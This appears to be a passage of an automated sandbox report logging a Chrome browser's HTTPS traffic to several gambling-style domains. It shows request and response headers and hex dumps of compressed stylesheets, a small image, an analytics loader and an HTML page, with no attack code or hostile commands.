                                                                                                                                                          2024-06-09 22:40:47 UTC2754INData Raw: 61 62 62 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: abb{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:40:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          89192.168.2.5498243.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:46 UTC376OUTGET /ocs/cc.png?1717972843131 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:47 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:47 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 c420c087f7cab31cec047685621eab8e.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: uPxpSRvePWZfWMaAAc0o27zABIc4gpnO4SWxEU84kGZNa8tIPNg8iA==
                                                                                                                                                          2024-06-09 22:40:47 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          90192.168.2.54982818.66.147.1214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:47 UTC372OUTGET /ocs/cc.png?1717972843129 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.bakeddove.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:48 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:47 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 e65c822edea04e16936bdb4537763dd4.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                                          X-Amz-Cf-Id: EBrGHLlIVwp5jgayczSY0LCJGE52FPsG1WSMI0oYFIq6jD6gqZLE-w==
                                                                                                                                                          2024-06-09 22:40:48 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          91192.168.2.549826183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:47 UTC560OUTGET /ftl/commonPage/themes/gui-base.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:47 UTC679INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 17118
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-02-10
                                                                                                                                                          ETag: W/"661623eb-14596"
                                                                                                                                                          Date: Fri, 07 Jun 2024 11:12:17 GMT
                                                                                                                                                          Last-Modified: Wed, 10 Apr 2024 05:30:19 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 11:12:17 GMT
                                                                                                                                                          Age: 214110
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-02-10
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-13
                                                                                                                                                          X-Cdn-Request-ID: ed11158ab6a288935982245eae8b687a
                                                                                                                                                          2024-06-09 22:40:47 UTC15705INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 7d 79 93 e4 c6 75 e7 ff fa 14 50 33 18 9c 21 ab 8a 00 ea ee 0a 4e 88 94 ad 23 2c d9 5e 51 d6 1e 14 83 81 02 b2 ba c0 41 01 25 00 d5 07 3b ca a1 f0 5a 22 ad b5 0e cb b2 b4 3a bc a2 7c 2d ad 90 e4 db 26 45 4a fe 32 ec 99 e1 5f fe 0a ce 1b 79 bc 44 a1 7a 64 ef 76 93 d3 55 99 bf 7c f9 f2 bd 97 2f ef cc 67 9f fe f0 87 bc a7 bd 8f 47 1b f4 42 71 f9 3b 9f ec bf 10 55 c8 bb 73 f3 c3 9f 3f fc d1 17 3f f8 9f 6f dd bc f1 e5 bb 04 70 8e ca 2a 2d 72 2f 18 f8 83 39 09 78 7e 57 af 8b f2 d4 7b b1 46 e7 28 27 21 bf 16 d5 c8 db 14 49 ba 4a 51 e2 85 7e 30 ed fb f3 be 1f e2 b8 67 3f f4 ec d3 de c3 9f ff d9 cd 1f 7e e9 c1 9b ff 72 f3 de d7 49 d0 47 d2 cd b6 28 6b 6f 57 66 77 4e d6 45 7e b6 8c 8a 41 5c 55 27 77 17 04 7e f3 a5 b7 6e fe ee 8b 37
                                                                                                                                                          Data Ascii: }yuP3!N#,^QA%;Z":|-&EJ2_yDzdvU|/gGBq;Us??op*-r/9x~W{F('!IJQ~0g?~rIG(koWfwNE~A\U'w~n7
                                                                                                                                                          2024-06-09 22:40:47 UTC1413INData Raw: 0a 12 ad 88 d7 b9 74 10 fb 78 08 fe 9f c9 87 6e 15 64 fc ff 1f 9d e3 6d f5 6a 08 e6 3f 4b a9 d8 81 fa d6 e0 05 bb 5d e6 75 57 78 e0 bb 7e f0 f5 6f be ff ee 3f 3f f8 fa 37 3e f8 f2 37 ff ed bd ef 11 b7 cb fa 24 fd 3a dd ea be d6 f7 e7 2b b4 92 1e 7f 48 6e ac 50 fa 41 0b 55 11 ea d0 93 21 d5 de 05 3f 98 ad dd 89 42 5b 05 45 5e a4 c0 0d 27 83 28 c3 7e 4d ba 2a df d3 a3 95 0b 46 9a ab 45 3c be b5 47 87 7a 5b 68 2c 00 0f 6f f4 84 03 fc 8f b4 96 db 12 89 14 7b 55 07 37 6a a7 85 ca ab 25 6f fa 85 ec fc 82 da 19 ae 91 c9 58 1d 93 8d e8 37 6a 6f 64 12 53 f4 b3 fb 2c 5c cc 4c 10 35 fa 52 8d e4 b3 35 f0 75 b0 24 8e 8f 48 c6 ec 51 b0 9a 92 ed e2 b1 6d 84 1a e7 fb bf f8 e3 47 bf f7 f7 78 40 83 07 20 1f 7c f1 f7 6e 7e fe 2d 62 94 15 a9 07 55 9f 54 c2 27 e4 60 c7 18 06
                                                                                                                                                          Data Ascii: txndmj?K]uWx~o??7>7$:+HnPAU!?B[E^'(~M*FE<Gz[h,o{U7j%oX7jodS,\L5R5u$HQmGx@ |n~-bUT'`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          92192.168.2.549825183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:47 UTC568OUTGET /ftl/commonPage/themes/gui-skin-default.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:47 UTC684INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 6253
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-09-17
                                                                                                                                                          ETag: W/"64ad1569-7b6e"
                                                                                                                                                          Date: Sat, 08 Jun 2024 22:46:19 GMT
                                                                                                                                                          Last-Modified: Tue, 11 Jul 2023 08:40:09 GMT
                                                                                                                                                          Expires: Mon, 08 Jul 2024 22:46:19 GMT
                                                                                                                                                          Age: 86068
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xianymp09:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XIANY-MP-09-17
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-25
                                                                                                                                                          X-Cdn-Request-ID: 69426c5619e09da4e8d8fd49e5c01cfd
                                                                                                                                                          2024-06-09 22:40:47 UTC6253INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 3d 6b 8f 1c c7 71 df f5 2b c6 14 08 de f1 6e 96 b3 cf bb dd 05 0f 3e 92 47 8a 72 68 4b 7c 58 24 65 7d 98 9d e9 dd 1d 71 76 66 31 33 cb bb e3 e2 00 05 49 04 2b 8e f3 70 92 0f 81 23 20 8c 11 c3 5f ec 0f 09 02 24 91 6d fd 97 c0 a4 c4 4f fe 0b e9 e7 4c 3f 6a 1e 7b 52 00 11 d0 1d a5 9b ed ae ae ae aa ae ae ae ae ae e9 fd e3 67 9f 5f b9 fc 9d 37 ac cb d6 2d 77 81 ae c5 27 0f 6e db f7 9e 04 91 7d 03 4d dd 55 98 59 5b af 7e f1 d7 2f ff e5 b7 af fe ec 57 2f 7e fc f1 1f 7f fb c9 ff 7e f4 0f f8 df 17 ff f4 bb 2f 3f f9 f7 2f fe e3 33 56 4b da 3f 45 49 1a c4 91 d5 6e 39 ad 21 29 38 5c 65 f3 38 19 59 f7 32 f4 14 45 a4 e4 86 9b 21 6b 11 fb c1 34 40 be d5 71 da 7b b6 33 b4 3b 6d 5c 77 85 50 71 35 ff b1 fc 24 5e fa f1 71 94 5a 7f f8 af 9f
                                                                                                                                                          Data Ascii: =kq+n>GrhK|X$e}qvf13I+p# _$mOL?j{Rg_7-w'n}MUY[~/W/~~/?/3VK?EIn9!)8\e8Y2E!k4@q{3;m\wPq5$^qZ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          93192.168.2.549827183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:47 UTC565OUTGET /ftl/bet365-1761/themes/style/common.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:47 UTC685INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 4200
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-09-26
                                                                                                                                                          ETag: W/"652f38c4-4d04"
                                                                                                                                                          Date: Fri, 07 Jun 2024 11:12:17 GMT
                                                                                                                                                          Last-Modified: Wed, 18 Oct 2023 01:45:40 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 11:12:17 GMT
                                                                                                                                                          Age: 214110
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xianymp09:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XIANY-MP-09-26
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-27
                                                                                                                                                          X-Cdn-Request-ID: 60c9c99e1ca19a4b6d04652ec26ba964
                                                                                                                                                          2024-06-09 22:40:47 UTC4200INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 1c cb ae e4 46 75 3d f7 2b 8a 19 8d 32 77 68 f7 f8 d9 4f e5 8a 44 28 ca 02 d8 90 05 08 a1 ab 6a bb ba db 19 b7 dd d8 be af b4 66 01 28 08 09 10 8b 64 89 c4 2a 51 90 90 10 b0 89 88 a2 fc 0c 33 93 5d 7e 81 7a b9 5c 55 2e 3f fa de 1b 10 d7 9a ee 76 77 d5 a9 53 e7 7d 4e 1d cf 37 5f 7c f5 cd 17 5f 3d 7b 0a 5e 7f fa cb d7 1f 7f f6 f2 a3 3f bc fc d7 c7 e0 e9 b3 13 fc 07 47 00 2e b6 d9 25 ca c1 a1 44 d7 a5 15 a1 30 cb 61 19 67 e9 02 a4 59 8a 96 2f 4e 4e 9e 3d 7d d3 f0 07 c2 6c b7 cb 52 f0 f2 c3 bf be fc f0 ef c0 34 04 af b1 ca a2 9b c3 3a 4b 4b 6b 0d 77 71 72 b3 00 6f fc 30 0e f3 ac c8 d6 25 f8 29 7c 17 c5 6f 8c 1e be 8b 92 4b 54 c6 21 04 3f 42 17 e8 e1 48 dc 8f de ca 63 98 8c 0a 98 16 56 81 f2 78 bd a4 a0 8a f8 03 b4 70 fc fd f5
                                                                                                                                                          Data Ascii: Fu=+2whOD(jf(d*Q3]~z\U.?vwS}N7_|_={^?G.%D0agY/NN=}lR4:KKkwqro0%)|oKT!?BHcVxp


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          94192.168.2.5498323.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:48 UTC465OUTGET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972844545290 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:48 UTC576INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:48 GMT
                                                                                                                                                          api-elapsed: 9
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Vary: Accept-Encoding,Accept-Encoding,Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 8556c27a5ede9723e65ce7f4dc8e80bc.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: m42HJ81NLVjp7FFpyRsVyRYL5BlhKlN7Moy-m4vcGwJ3N95f787qdQ==
                                                                                                                                                          2024-06-09 22:40:48 UTC2754INData Raw: 61 62 62 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: abb{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:40:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          95192.168.2.549831202.61.87.2194434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:48 UTC697OUTGET /default.html HTTP/1.1
                                                                                                                                                          Host: hg679.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:40:48 UTC404INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:48 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 35313
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Fri, 18 Aug 2023 04:30:01 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "64def3c9-89f1"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:48 UTC15980INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 2e 69 6e 69 74 2d 69 70 2d 62 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head> <meta charset=utf-8> <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"> <title></title> <style> .init-ip-block{position: fixed;top: 0;left: 0;background-color
